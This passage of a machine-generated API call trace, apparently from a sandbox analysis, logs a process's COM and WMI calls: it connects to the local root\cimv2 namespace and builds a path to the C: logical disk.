[7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0201.698] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027190, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x6029ff0) returned 0x0 [0201.698] WbemDefPath:IUnknown:Release (This=0x6027190) returned 0x0 [0201.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x6029ff0) returned 0x0 [0201.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0201.698] WbemDefPath:IUnknown:AddRef (This=0x6029ff0) returned 0x3 [0201.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0201.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0201.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0xbb58b8) returned 0x0 [0201.698] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb58b8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0201.698] WbemDefPath:IUnknown:Release (This=0xbb58b8) returned 0x3 [0201.698] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0201.698] CoGetContextToken (in: pToken=0x6d8ddb8 | out: pToken=0x6d8ddb8) returned 0x0 [0201.698] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0201.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0201.698] WbemDefPath:IUnknown:Release (This=0x6029ff0) returned 0x2 [0201.698] WbemDefPath:IUnknown:Release (This=0x6029ff0) returned 0x1 [0201.698] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0201.698] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0201.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x6029ff0) returned 0x0 [0201.699] WbemDefPath:IUnknown:AddRef (This=0x6029ff0) returned 0x3 [0201.699] WbemDefPath:IUnknown:Release (This=0x6029ff0) returned 0x2 [0201.699] WbemDefPath:IWbemPath:SetText (This=0x6029ff0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0201.699] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ff0, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0201.699] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, pszText=0x0) returned 0x0 [0201.699] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0201.699] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029ff0, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0201.699] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ff0, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0201.699] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029ff0, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0201.699] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029ff0, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0201.699] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ff0, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0201.699] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0201.699] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0201.699] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0201.699] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0201.699] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0201.699] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0201.699] IUnknown:Release (This=0xb51e34) returned 0x1 [0201.700] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x60271a0) returned 0x0 [0201.700] WbemDefPath:IUnknown:QueryInterface (in: This=0x60271a0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0201.700] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60271a0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x602a060) returned 0x0 [0201.700] WbemDefPath:IUnknown:Release (This=0x60271a0) returned 0x0 [0201.700] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a060, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x602a060) returned 0x0 [0201.700] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a060, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0201.700] WbemDefPath:IUnknown:AddRef (This=0x602a060) returned 0x3 [0201.700] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a060, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0201.700] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a060, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0201.700] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a060, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0xbb59b8) returned 0x0 [0201.700] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb59b8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0201.700] WbemDefPath:IUnknown:Release (This=0xbb59b8) returned 0x3 [0201.700] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0201.700] CoGetContextToken (in: pToken=0x6d8dd00 | out: pToken=0x6d8dd00) returned 0x0 [0201.700] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0201.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a060, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0201.701] WbemDefPath:IUnknown:Release (This=0x602a060) returned 0x2 [0201.701] WbemDefPath:IUnknown:Release (This=0x602a060) returned 0x1 [0201.701] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0201.701] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0201.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a060, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x602a060) returned 0x0 [0201.701] WbemDefPath:IUnknown:AddRef (This=0x602a060) returned 0x3 [0201.701] WbemDefPath:IUnknown:Release (This=0x602a060) returned 0x2 [0201.701] WbemDefPath:IWbemPath:SetText (This=0x602a060, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0201.701] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a060, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0201.701] WbemDefPath:IWbemPath:GetText (in: This=0x602a060, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0201.701] WbemDefPath:IWbemPath:GetText (in: This=0x602a060, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0201.701] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0201.701] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0201.701] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0201.701] IUnknown:Release (This=0xb51e34) returned 0x1 [0201.702] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x6024920) returned 0x0 [0201.702] WbemLocator:IUnknown:QueryInterface (in: This=0x6024920, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0201.702] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024920, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x6027200) returned 0x0 [0201.702] WbemLocator:IUnknown:Release (This=0x6024920) returned 0x0 [0201.702] WbemLocator:IUnknown:QueryInterface (in: This=0x6027200, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x6027200) returned 0x0 [0201.702] WbemLocator:IUnknown:QueryInterface (in: This=0x6027200, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0201.702] WbemLocator:IUnknown:AddRef (This=0x6027200) returned 0x3 [0201.702] WbemLocator:IUnknown:QueryInterface (in: This=0x6027200, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0201.702] WbemLocator:IUnknown:QueryInterface (in: This=0x6027200, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0201.702] WbemLocator:IUnknown:QueryInterface (in: This=0x6027200, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0201.702] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0201.702] CoGetContextToken (in: pToken=0x6d8dfe0 | out: pToken=0x6d8dfe0) returned 0x0 [0201.702] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0201.702] WbemLocator:IUnknown:QueryInterface (in: This=0x6027200, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0201.702] WbemLocator:IUnknown:Release (This=0x6027200) returned 0x2 [0201.702] WbemLocator:IUnknown:Release (This=0x6027200) returned 0x1 [0201.702] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0201.702] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0201.702] WbemLocator:IUnknown:QueryInterface (in: This=0x6027200, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: ppvObject=0x6d8ead4*=0x6027200) returned 0x0 [0201.702] WbemLocator:IUnknown:AddRef (This=0x6027200) returned 0x3 [0201.703] WbemLocator:IUnknown:Release (This=0x6027200) returned 0x2 [0201.703] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a060, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0201.703] WbemDefPath:IWbemPath:GetText (in: This=0x602a060, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0201.703] WbemDefPath:IWbemPath:GetText (in: This=0x602a060, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0201.703] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x6027210) returned 0x0 [0201.703] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027210, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x603373c) returned 0x0 [0202.955] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0xb5b4f4) returned 0x0 [0202.955] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b4f4, pProxy=0x603373c, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0202.955] WbemLocator:IUnknown:Release (This=0xb5b4f4) returned 0x1 [0202.956] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0xb5b514) returned 0x0 [0202.956] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0xb5b4f4) returned 0x0 [0202.956] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b4f4, pProxy=0x603373c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0202.956] WbemLocator:IUnknown:Release (This=0xb5b4f4) returned 0x2 [0202.956] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x1 [0202.956] CoTaskMemFree (pv=0xbd4a38) [0202.956] WbemLocator:IUnknown:Release (This=0x6027210) returned 0x0 [0202.956] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: ppvObject=0x6d8e664*=0xb5b514) returned 0x0 [0202.956] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0202.961] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0202.963] WbemLocator:IUnknown:AddRef (This=0xb5b514) returned 0x3 [0202.963] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0202.964] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0202.965] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0xb5b474) returned 0x0 [0202.965] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b474, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0202.965] WbemLocator:IUnknown:Release (This=0xb5b474) returned 0x3 [0202.965] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0202.965] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0202.965] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0xb5b4fc) returned 0x0 [0202.966] WbemLocator:IRpcOptions:Query (in: This=0xb5b4fc, pPrx=0xb5b514, dwProperty=2, pdwValue=0x6d8e458 | out: pdwValue=0x6d8e458) returned 0x80004002 [0202.966] WbemLocator:IUnknown:Release (This=0xb5b4fc) returned 0x3 [0202.966] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x2 [0202.966] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0202.966] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0202.966] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: 